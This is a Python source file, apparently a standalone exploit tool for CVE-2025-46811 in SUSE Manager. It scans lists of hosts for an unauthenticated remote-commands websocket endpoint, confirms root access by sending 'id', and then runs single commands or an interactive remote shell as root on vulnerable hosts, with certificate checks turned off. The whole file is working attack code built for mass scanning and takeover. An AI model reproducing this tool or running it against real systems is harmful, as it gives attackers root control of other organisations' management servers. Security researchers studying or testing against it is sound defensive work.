#!/usr/bin/env python3 import asyncio import websockets import ssl import argparse from concurrent.futures import ThreadPoolExecutor from typing import List, Tuple, Optional import logging from colorama import Fore, Style, init # Initialize colorama init(autoreset=True) class SUSEManagerExploiter: """SUSE Manager CVE-2025-46811 Exploitation Tool""" def __init__(self, debug: bool = False): self.ssl_context = ssl.create_default_context() self.ssl_context.check_hostname = False self.ssl_context.verify_mode = ssl.CERT_NONE self.debug = debug self._setup_logging() def _setup_logging(self): """Configure debug logging""" logging.basicConfig( level=logging.DEBUG if self.debug else logging.INFO, format=f'{Fore.CYAN}%(asctime)s{Style.RESET_ALL} - %(levelname)s - %(message)s', handlers=[logging.StreamHandler()] ) self.logger = logging.getLogger(__name__) def _debug_print(self, message: str, level: str = "info"): """Enhanced debug output with colors""" color = { "debug": Fore.BLUE, "info": Fore.GREEN, "warning": Fore.YELLOW, "error": Fore.RED, "critical": Fore.RED + Style.BRIGHT }.get(level.lower(), Fore.WHITE) if self.debug or level != "debug": print(f"{color}[{level.upper()}]{Style.RESET_ALL} {message}") async def check_vulnerability(self, host: str, timeout: int = 5) -> Tuple[str, bool, str]: """Check if target is vulnerable""" self._debug_print(f"Testing {host}", "debug") try: async with websockets.connect( f"wss://{host}/rhn/websocket/minion/remote-commands", ssl=self.ssl_context, timeout=timeout, extra_headers={"Origin": f"https://{host}"} ) as ws: self._debug_print(f"Connected to {host}", "info") await ws.send('id') response = await asyncio.wait_for(ws.recv(), timeout=2) self._debug_print(f"Received response: {response}", "debug") if 'uid=0(root)' in response: self._debug_print(f"{host} is vulnerable!", "info") return (host, True, "Vulnerable - root access confirmed") return (host, False, "Unexpected response format") except Exception as e: self._debug_print(f"Error checking {host}: {str(e)}", "error") return (host, False, f"Error: {str(e)}") async def execute_command(self, host: str, command: str, timeout: int = 10) -> str: """Execute commands on vulnerable hosts""" self._debug_print(f"Executing: {command} on {host}", "debug") try: async with websockets.connect( f"wss://{host}/rhn/websocket/minion/remote-commands", ssl=self.ssl_context, timeout=timeout, extra_headers={"Origin": f"https://{host}"} ) as ws: await ws.send(command) response = await asyncio.wait_for(ws.recv(), timeout=timeout) self._debug_print(f"Command output: {response}", "debug") return response except Exception as e: error_msg = f"Command execution failed: {str(e)}" self._debug_print(error_msg, "error") return error_msg async def batch_scan(self, hosts: List[str], max_workers: int = 10) -> List[Tuple[str, bool, str]]: """Concurrently scan multiple hosts""" self._debug_print(f"Starting batch scan of {len(hosts)} hosts", "info") tasks = [self.check_vulnerability(host) for host in hosts] return await asyncio.gather(*tasks) async def interactive_shell(self, host: str): """Start interactive RCE session""" self._debug_print(f"Starting interactive session with {host}", "info") print(f"{Fore.GREEN}[+] Connected to {host} (type 'exit' to quit){Style.RESET_ALL}") while True: try: cmd = input(f"{Fore.YELLOW}remote-shell> {Style.RESET_ALL}") if cmd.lower() in ('exit', 'quit'): break result = await self.execute_command(host, cmd) print(f"{Fore.CYAN}{result}{Style.RESET_ALL}") except KeyboardInterrupt: self._debug_print("Session terminated by user", "warning") break except Exception as e: print(f"{Fore.RED}[!] Error: {e}{Style.RESET_ALL}") def main(): parser = argparse.ArgumentParser(description="SUSE Manager Vulnerability Scanner & Exploiter") subparsers = parser.add_subparsers(dest='mode', required=True) # Global arguments parser.add_argument('--debug', action='store_true', help='Enable debug output') # Scan mode scan_parser = subparsers.add_parser('scan', help='Scan for vulnerable hosts') scan_parser.add_argument('-i', '--input', required=True, help='Input file containing hosts (IP/Domain)') scan_parser.add_argument('-o', '--output', help='Output file for vulnerable hosts') scan_parser.add_argument('-t', '--threads', type=int, default=10, help='Concurrent threads') # Exploit mode exploit_parser = subparsers.add_parser('exploit', help='Execute commands on vulnerable host') exploit_parser.add_argument('host', help='Target host (IP/Domain)') exploit_parser.add_argument('-c', '--command', help='Single command to execute') args = parser.parse_args() exploiter = SUSEManagerExploiter(debug=args.debug) if args.mode == 'scan': with open(args.input) as f: targets = [line.strip() for line in f if line.strip()] exploiter._debug_print(f"Scanning {len(targets)} hosts...", "info") results = asyncio.run(exploiter.batch_scan(targets, args.threads)) vulnerable = [host for host, is_vuln, _ in results if is_vuln] for host, _, msg in results: status = f"{Fore.GREEN}VULNERABLE{Style.RESET_ALL}" if host in vulnerable else f"{Fore.RED}SAFE{Style.RESET_ALL}" print(f"{host}: {status} - {msg}") if args.output and vulnerable: with open(args.output, 'w') as f: f.write("\n".join(vulnerable)) exploiter._debug_print(f"Vulnerable hosts saved to {args.output}", "info") elif args.mode == 'exploit': if args.command: print(asyncio.run(exploiter.execute_command(args.host, args.command))) else: asyncio.run(exploiter.interactive_shell(args.host)) if __name__ == "__main__": main()